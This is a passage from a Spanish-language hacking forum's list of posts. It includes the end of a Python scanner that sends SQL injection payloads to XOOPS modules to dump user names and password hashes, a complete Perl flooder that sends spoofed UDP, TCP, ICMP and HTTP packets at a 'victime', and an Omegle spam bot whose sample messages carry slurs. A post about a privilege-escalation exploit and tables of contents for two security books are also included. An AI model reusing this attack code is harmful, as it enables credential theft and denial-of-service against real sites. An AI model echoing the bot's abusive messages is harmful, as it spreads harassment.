	"modules/glossaires/glossaires-p-f.php?op=ImprDef&sid=99999/**/union/**/select/**/000,pass,uname,pass/**/from/**/xoops_users/*where%20terme",
	"modules/wfdownloads/viewcat.php?cid=999%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+000,concat(uname,0x3a,pass)/**/from%2F%2A%2A%2Fxoops_users/*where%20pass",
	"modules/gallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from/**/xoops_users/*",
	"modules/my_egallery/index.php?do=showgall&gid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3,4,5,6/**/from+xoops_users/*",
	"modules/tutorials/printpage.php?tid=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),1,concat(uname,0x3a,pass),3,4,5/**/from/**/xoops_users/*",
	"modules/tutorials/index.php?op=printpage&tid=-9999999/**/union/**/select/**/0,1,concat(uname,0x3a,pass),3/**/from/**/xoops_users/*",
	"modules/dictionary/print.php?id=-9999999/**/union/**/select/**/concat(uname,0x3a,pass),concat(uname,0x3a,pass)/**/from/**/xoops_users/*"]


if len(sys.argv) != 2:
	print "\nUsage: ./xoopscan.py <site>"
	print "Ex: ./xoopscan.py www.test.com\n"
	sys.exit(1)


host = sys.argv[1].replace("/index.php", "")
if host[-1] != "/":
	host = host+"/"
if host[:7] != "http://":
	host = "http://"+host
	
print "\n[+] Site:",host
print "[+] SQL Loaded:",len(sqls) 


print "[+] Starting Scan...\n" 
for sql in sqls:
	time.sleep(3) #Change this if needed
	#print "[+] Trying:",host+sql.replace("\n","")
	try:
		source = urllib2.urlopen(host+sql.replace("\n","")).read()
		md5s = re.findall("[a-f0-9]"*32,source)
		if len(md5s) >= 1:
			print "[!]",host+sql.replace("\n","")
			for md5 in md5s:
				print "\n[+]MD5:",md5
	except(urllib2.HTTPError,urllib2.URLError):
		pass
print "\n[-] Done\n"
#27
Hacking / CS-Omegle-Bot
Julio 25, 2017, 01:03:35 PM
Les dejo este script para spamear omegle un chat al azar:


CS Omegle Bot will help you to send automatic messages to stranger. You can add interest and can pre define upto 4 messages. While entering interest make sure to add comma.Dependencies



  • Python
  • Selenium
  • PyVirtualDisplay

Código: php

Usage :

$ python CS.Omegle.Bot.py
Enter the interests Example. friends,girls,fag, >> girls,friends,love,justin bieber
Enter your first message (1/4) >> Hi...
Enter your second message (2/4) >> You are a FAG
Enter your third message (3/4) >> You Look stupid
Enter your fourth message (4/4) >> Go away
Enter y to use proxy and n to not use proxy >> n



Descarga: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#28
C# - VB.NET / Src Bootnet + Login User
Julio 24, 2017, 11:09:09 PM





No tienes permitido ver los links. Registrarse o Entrar a mi cuenta
#29
Cursos, manuales y libros / Hacking Exposed Mobile Security Secrets & Solutions
Julio 24, 2017, 09:27:06 PM

Código: php
▼ 1 The Mobile Risk Ecosystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 1
The Mobile Ecosystem . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Scale . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 2
Perceived Insecurity . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3
The Mobile Risk Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 4
Physical Risks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 9
Service Risks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 10
App Risks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11
Our Agenda . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 17
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 19
▼ 2 Hacking the Cellular Network . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 21
Basic Cellular Network Functionality . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Interoperability . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23
Voice Calls . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 26
The Control Channels . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 27
Voice Mailboxes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Short Message Service . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 30
Attacks and Countermeasures . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33
The Brave New World of IP . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 43
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 46
▼ 3 iOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 47
Know Your iPhone . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 49
How Secure Is iOS? . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 51
Jailbreaking: Unleash the Fury! . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 52
Boot-based Jailbreak . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 54
00_FM.indd xiii 6/19/2013 12:33:23 AM
xiv Hacking Exposed: Mobile Security Secrets & Solutions
Hacking Other iPhones: Fury, Unleashed! . . . . . . . . . . . . . . . . . . . . . . . . . . . . 62
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 78
▼ 4 Android . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 81
Security Model . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 84
Application Components . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 85
Data Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
Near Field Communication (NFC) . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 86
Android Development . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Android Emulator . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 87
Android Debug Bridge . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 88
Rooting . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 89
Decompiling and Disassembly . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
Decompiling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 91
Intercepting Network Traffi c . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Adding Trusted CA Certifi cates . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95
Confi guring a Proxy Server . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 97
Intent-Based Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 103
NFC-Based Attacks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 105
Information Leakage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
Leakage via Internal Files . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 109
Leakage via External Storage . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 110
Information Leakage via Logs . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 112
Information Leakage via Insecure Components . . . . . . . . . . . . . . . . . 113
General Mitigation Strategies to Prevent Information Leakage . . . . 117
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 118
▼ 5 Mobile Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 119
Android Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 120
iOS Malware . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 140
Malware Security: Android vs. iOS . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 144
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 146
▼ 6 Mobile Services and Mobile Web . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 147
General Web Service Security Guidelines . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 148
Attacks Against XML-based Web Services . . . . . . . . . . . . . . . . . . . . . . . . . . . . 149
Common Authentication and Authorization Frameworks . . . . . . . . . . . . . . 155
OAuth 2 . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 156
SAML . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 163
Mobile Web Browser and WebView Security . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Exploiting Custom URI Schemes . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 169
Exploiting JavaScript Bridges . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 177
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 188
00_FM.indd xiv 6/19/2013 12:33:23 AM
Contents xv
▼ 7 Mobile Device Management . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 189
MDM Frameworks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 190
Device Provisioning . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 192
Bypassing MDM . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 196
Decompiling and Debugging Apps . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 203
Detecting Jailbreaks . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 207
Remote Wipe and Lock . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 209
▼ 8 Mobile Development Security . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 211
Mobile App Threat Modeling . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 212
Threats . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 213
Assets . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 216
Finishing and Using the Threat Model . . . . . . . . . . . . . . . . . . . . . . . . . 218
Secure Mobile Development Guidance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Preparation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 218
Secure Mobile Application Guidelines . . . . . . . . . . . . . . . . . . . . . . . . . 221
Testing to Make Sure . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
For Further Reading . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 232
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 233
▼ 9 Mobile Payments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 235
Current Generation . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 236
Contactless Smartcard Payments . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238
Secure Element . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 238
Secure Element API . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 242
Mobile Application . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Google Wallet . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 243
Square . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 253
Summary . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 255
▼ A Consumer Security Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 257
Security Checklist . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 258
▼ B Mobile Application Penetration Testing Toolkit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 263
iOS Pen Test Toolkit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 264
Android Pen Test Toolkit . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 266


Enlace de descarga:
Código: php
https://jumpshare.com/v/f92aUO9UkSXbhSnHyo5f
#30
Debates, Reviews y Opiniones / Re:Si se cae Google ¿Sería el apocalipsis internauta?
Julio 24, 2017, 04:57:47 PM
Yo usaría Bing, y correo pues estaría jodido, ya que el institucional de mi trabajo esta con Google  :P
#31
Hacking / Windows COM Elevation of Privilege Vulnerability - Win 10 Test
Julio 24, 2017, 11:29:02 AM
Buenas, esto no es tan nuevo pero no lo vi en el foro :D


Bueno el siguiente exploit sirve para cambiar la Password de usuarios sin tener privilegios, veamos:


Ejecutamos la consola y el net user "pass" para intentar cambiar, (todo sin el exploit aun)


Como vemos no nos deja cambiar la password,

Probemos ahora con el exploit:


y Listo.

les dejo la web donde pueden descargarlo: No tienes permitido ver los links. Registrarse o Entrar a mi cuenta

Ademas de eso un video que busque en youtube ya que no tenia tiempo para hacer uno:


Saludos!
#32
Perl / [Perl] - Spoofed Attack script
Julio 24, 2017, 10:12:10 AM

Código: perl
#!/usr/bin/perluse Term::ANSIColor;
use Net::RawIP;
use IO::Socket::INET;


( $PROG = $0 ) =~ s/^.*[\/\\]//;


if ( @ARGV == 0 ) {
        print "Usage : ./$PROG [IP] [Port] [Time] [Protocol] \n\n";
        print "Protocols :  \n\n-UDP\n-TCP\n-ICMP\n-HTTP\n";
    exit;
}


my $size = 'ABABABAZERTYUIOP1234567890CD123456789AZERTYUIOPQSDFGHJKLMEFGHIJKLMNOPKRSTUVWXYZ​CDEFEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrGEFGHIJKLMNOPQRSTUVWXYZ1234​56789abcdefghijklmnopqrEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrEFGHIJKL​MNOPQRSTUVWXYZ123456789abcdefghijklmnopqrHIJKLMNOPQREFGHIJKLMNOPQRSTUVWXYZ123456​789abcdefghijklmnopqrEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrEFGHIJKLMN​OPQRSTUVWXYZ123456789abcdefghijklmnopqrSTUVWXYZ123456789abcdefghijklmnopqrstuvwx​yzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQ​RSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789a​bcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrst​uvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLM​NOPQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ123456​789abcdefghijklmQRSTUVWXYZ123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRS​TUVWXYZ123456789abcdefghijklmnopqrstuvwxyz';
my $victime = $ARGV[0];
my $port = $ARGV[1];
my $temps = $ARGV[2];
my $proto = $ARGV[3];
$endtime = time() + ($temps ? $temps : 1000000);














my @referer = ('http://www.google.com/url?sa=t&rct=j&q=&eip_source=s&source=web&cd=1&url=$victime');


my @agent = ('Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Mozilla/5.0 (Windows; I; Windows NT 5.1; ru; rv:1.9.2.13)',
'Mozilla/5.0 (Windows NT 6.1; rv:24.0) Gecko/20100101 Firefox/24.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10.6; rv:21.0) Gecko/20100101 Firefox/21.0',
'Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; .NET CLR 2.0.50727)',
'Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)',
'Mozilla/5.0 (Linux; U; Android 4.2.2; zh-cn; LNV-Lenovo K910e/S100; 1080*1920; CTC/2.0) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 Mobile Safa',
'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Mozilla/5.0 (Windows NT 6.2; WOW64; rv:16.0.1) Gecko/20121011 Firefox/16.0.1',
'Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; en) Opera 8.0',
'Mozilla/4.0 (compatible; MSIE 6.0; MSIE 5.5; Windows NT 5.1) Opera 7.02 [en]',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/30.0.1599.101 Safari/537.36',
'Lynx/2.8.8dev.12 libwww-FM/2.14 SSL-MM/1.4.1 GNUTLS/2.12.14',
'Opera/9.20 (Windows NT 6.0; U; en)',
'Mozilla/5.0 (X11; Linux) KHTML/4.9.1 (like Gecko) Konqueror/4.9',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; zh-cn) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; PPC Mac OS X 10_5_8; ja-jp) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; it-it) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; fr-fr) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; es-es) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-us) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; en-gb) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (Macintosh; U; Intel Mac OS X 10_6_6; de-de) AppleWebKit/533.20.25 (KHTML, like Gecko) Version/5.0.4 Safari/533.20.27',
'Mozilla/5.0 (X11; Linux 3.5.4-1-ARCH i686; es) KHTML/4.9.1 (like Gecko) Konqueror/4.9',
'Mozilla/5.0 (compatible; Konqueror/3.5; SunOS)',
'Mozilla/5.0 (compatible; Konqueror/3.5; NetBSD 4.0_RC3; X11) KHTML/3.5.7 (like Gecko)',
'Mozilla/5.0 (iPad; CPU OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5355d Safari/8536.25',
'Mozilla/5.0 (X11) KHTML/4.9.1 (like Gecko) Konqueror/4.9)');


my $foke =
"\x47\x45\x54\x20\x2f\x20\x48\x54\x54\x50\x2f\x31\x2e\x30".
"\x48\x6f\x73\x74\x3a\x20\0x687474703a2f2f", pack("H*", $victime).
"\x52\x65\x66\x65\x72\x65\x72\x3a\x20\x68\x74\x74\x70\x3a\x2f\x2f\x77\x77\x77\x2e​\x67\x6f\x6f\x67\x6c\x65\x2e\x63\x6f\x6d\x2f\x75\x72\x6c\x3f\x73\x61\x3d\x74\x26​\x72\x63\x74\x3d\x6a\x26\x71\x3d\x26\x65\x73\x72\x63\x3d\x73\x26\x73\x6f\x75\x72​\x63\x65\x3d\x77\x65\x62\x26\x63\x64\x3d\x31\x26\x75\x72\x6c\x3d\0x687474703a2f2​f", pack("H*", $victime).
"\x43\x6f\x6e\x6e\x65\x63\x74\x69\x6f\x6e\x3a\x20\x4b\x65\x65\x70\x2d\x41\x6c\x69​\x76\x65";


my $reqq =
"POST / HTTP/1.0\r\n".
"Referer: {foreach (sort {int(rand(1))-1} @referer)}\r\n".
"Content-Type: application/x-www-form-urlencoded\r\n".
"Connection: Keep-Alive\r\n".
"User-Agent: {foreach (sort {int(rand(1))-1} @agent)}\r\n".
"Host: $victime\r\n".
"\r\n".
"skype=00000&host=00000&login=00000&password=00000&pseudo=00000&about=00000&test=00000&home=00000&page=00000&pages=00000&info=00000&infos=00000&check=00000&verif=00000&port=00000&time=00000&temps=00000&key=00000&news=00000&submit=00000&msg=00000&message=00000&link=00000&url=00000&[email protected]&[email protected]&show=00000&id=00000\r\n";
















if( $proto eq 'UDP' )


                {
                


print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0




                
                    print color ("red"),"[+]",color("reset"),"Start Flooding .... ";
                    print color ("red"),"[+]",color("reset"),"\n";
                    for (;time() <= $endtime;) {
                                                    my $port_source = int(rand(65534)+1);
                                                    my $ip_source = join ".", map int rand 255, 1 .. 4;
                                                    
                                                    my $sport = int(rand(255));
                                                    $frag = int(rand(2));


                                                    my $packet = new Net::RawIP({
                                                            ip => {
                                                                    saddr => $ip_source,
                                                                    daddr => $victime,
                                                                    frag_off => $frag,
                                                                    },
                                                            udp => {
                                                                    source => $sport,
                                                                    dest => $port,
                                                                    data=> $size,
                                                                    }
                                                                                });


                                                    $packet->send;
      
      
                                                } 
        
                }
   


   
  
if( $proto eq 'TCP' ) {
print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0


        print color ("red"),"[+]",color("reset"),"Start Flooding ....";
                    print color ("red"),"[+]",color("reset"),"\n";


    for (;time() <= $endtime;) {


        my( $pktct, $sport, $frag, $urg, $psh, $rst, $fin, $syn, $ack);
        my $port_source = int(rand(65534)+1);
        my $ip_source = join ".", map int rand 255, 1 .. 4;
        


    
        $frag = int(rand(2));
        $urg = int(rand(2));
        $psh = int(rand(2));
        $rst = int(rand(2));
        $fin = int(rand(2));
        $syn = int(rand(2));
        $ack = int(rand(2));
     


        my $packet = new Net::RawIP({
            ip => {
                saddr => $ip_source,
                daddr => $victime,
                frag_off => $frag,
                  },
            tcp => {
                source => $port_source,
                dest => $port,
                urg => $urg,
                psh => $psh,
                rst => $rst,
                fin => $fin,
                syn => $syn,
                ack => $ack,
                data => $size,
                    }
                                    });


        $packet->send;
      
      
                                    } 
        
                                }
   
   
   
   
    if( $proto eq 'ICMP' ) {
    
    print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0
    print color ("red"),"[+]",color("reset"),"Start Flooding ....";
                    print color ("red"),"[+]",color("reset"),"\n";
for (;time() <= $endtime;) {


    my($pktct, $code, $type, $frag);
         my $port_source = int(rand(65534)+1);
     my $ip_source = join ".", map int rand 255, 1 .. 4;
    




     $code = int(rand(255));
      $type = int(rand(255));
      $frag = int(rand(2));
     


       my $packet = new Net::RawIP({
         ip => {
            saddr =>$ip_source,
            daddr => $victime,
            frag_off => $frag,
         },
         icmp => {
            code => $code,
            type => $type,
         }
      });


      $packet->send;
      
      
       } 
        
   }
   
   
   
   
    if( $proto eq 'HTTP' ) {
    print "\033[2J";    #clear the screen
print "\033[0;0H"; #jump to 0,0
    print color ("red"),"[+]",color("reset"),"Start Flooding ....";
                    print color ("red"),"[+]",color("reset"),"\n";


for (;time() <= $endtime;) {
        
        
        


$sock = IO::Socket::INET->new(PeerAddr => $victime, PeerPort => 80, Proto => "tcp") or next;
print $sock $reqq;
print $sock $foke;
close($sock);
       } 
        
   }
#33
Cursos, manuales y libros / Coding for Penetration Testers
Julio 22, 2017, 07:04:13 PM

Código: php
CHAPTER 1 Introduction to command shell scripting ................. 1
On Shell Scripting .........................................................................1
What is a shell? ........................................................................2
What is a script? .......................................................................3
Shell scripts...............................................................................3
Where shell scripting is useful .................................................4
UNIX, Linux, and OS X shell scripting .......................................5
Shell availability and choices...................................................5
Working with shells ..................................................................7
Bash basics ....................................................................................8
Hello World ..............................................................................8
Variables..................................................................................10
Arguments...............................................................................10
Control statements ..................................................................11
Putting it all together with bash..................................................15
Adding /dev/tcp/ support to bash ...........................................15
Building a port scanner with bash..........................................16
Improving the script ...............................................................18
Windows scripting .......................................................................18
Shell availability and choices.................................................18
Command.com and CMD.exe ................................................18
PowerShell ..............................................................................19
Cygwin....................................................................................20
Other shells .............................................................................21
PowerShell basics ........................................................................21
Hello World ...........................................................................22
Variables..................................................................................23
Arguments...............................................................................25
Control statements ..................................................................26
Conditionals ............................................................................27
Looping...................................................................................28
Putting it all together with PowerShell.......................................29
Building a port scanner with PowerShell ..............................30
Improving the script ...............................................................32
Summary......................................................................................32
Endnotes ......................................................................................33
v
CHAPTER 2 Introduction to Python ..........................................35
What is Python? ..........................................................................35
Where do we get Python? ......................................................36
Where is Python useful? .............................................................36
Multiplatform scripting...........................................................36
Network scripting ...................................................................36
Extensive modules ..................................................................37
Reusable code that is easy to create ......................................37
Python basics ...............................................................................38
Getting started.........................................................................38
Variables..................................................................................39
Modules...................................................................................40
Arguments...............................................................................41
Lists.........................................................................................44
Dictionaries .............................................................................46
Control statements ..................................................................51
Functions.................................................................................52
File manipulation.........................................................................54
Exception handling .................................................................55
Network communications............................................................57
Client communications ...........................................................57
Server communications ..........................................................59
Scapy.......................................................................................62
Summary......................................................................................68
Endnotes ......................................................................................68
CHAPTER 3 Introduction to Perl ..............................................69
Where Perl is useful ....................................................................69
Handling text ..........................................................................70
Gluing applications together ..................................................70
Working with Perl .......................................................................71
Editing tools............................................................................71
Extending Perl scripts.............................................................72
GUIs in Perl ............................................................................73
Perl basics....................................................................................73
Hello World ............................................................................73
Variables..................................................................................75
Shell commands......................................................................76
Arguments...............................................................................79
Control statements ..................................................................79
Regular expressions ................................................................85
File input and output ..............................................................87
Putting it all together...................................................................91
vi Contents
Building an SNMP scanner with Perl ....................................91
Improving the script ...............................................................97
Summary......................................................................................97
Endnotes ......................................................................................98
CHAPTER 4 Introduction to Ruby.............................................99
Where Ruby is useful..................................................................99
Ruby basics................................................................................100
Variables................................................................................102
Arrays and hashes.................................................................103
Control statements ................................................................106
Functions...............................................................................109
Building classes with Ruby.......................................................112
Building a class ....................................................................112
Extending a class ..................................................................114
Accessing class data .............................................................115
File manipulation.......................................................................117
Database basics..........................................................................118
Using DBI.............................................................................119
Using Active Record ............................................................121
Network operations ...................................................................124
Client communications .........................................................124
Server communications ........................................................126
Putting it all together.................................................................129
Summary....................................................................................134
Endnotes ....................................................................................135
CHAPTER 5 Introduction to Web scripting with PHP ............... 137
Where Web scripting is useful ..................................................137
Getting started with PHP...........................................................138
Scope.....................................................................................138
PHP basics ............................................................................138
Functions...............................................................................145
Handling forms with PHP.........................................................147
File handling and command execution .....................................150
File handling .........................................................................150
Command execution .............................................................154
Putting it all together.................................................................156
Summary....................................................................................159
CHAPTER 6 Manipulating Windows with PowerShell .............. 161
Dealing with execution policies in PowerShell ........................161
Contents vii
Execution policies.................................................................161
Bypassing the policies ..........................................................162
Getting in ..............................................................................165
Penetration testing uses for PowerShell....................................166
Controlling processes and services ......................................166
Interfacing with the event logs.............................................168
Getting and sending files over the network .........................169
Interfacing with the Registry................................................171
PowerShell and Metasploit........................................................176
PowerShell-oriented Metasploit modules ............................177
PowerDump ..........................................................................177
Windows gather PowerShell environment setting
enumeration ..........................................................................178
Making use of the modules ..................................................178
Summary....................................................................................179
Endnotes ....................................................................................180
CHAPTER 7 Scanner scripting............................................... 181
Working with scanning tools.....................................................181
Netcat ....................................................................................181
Nmap.....................................................................................182
Nessus/OpenVAS..................................................................182
Netcat.........................................................................................183
Implementations of Netcat ...................................................183
Simple Netcat usage .............................................................184
Building a Web server with Netcat ......................................185
Transferring files with Netcat...............................................187
Nmap..........................................................................................191
Working with service probes in Nmap ................................191
The Nmap scripting engine ..................................................194
Building Nmap NSE files.....................................................194
Nessus/OpenVAS.......................................................................196
NASL in Nessus and OpenVAS...........................................196
Nessus attack scripting language (NASL) ...........................196
Summary....................................................................................199
Endnotes ....................................................................................200
CHAPTER 8 Information gathering ......................................... 201
Information gathering for penetration testing...........................201
Sources of information .........................................................202
Patterns in information .........................................................202
Metadata................................................................................203
viii Contents
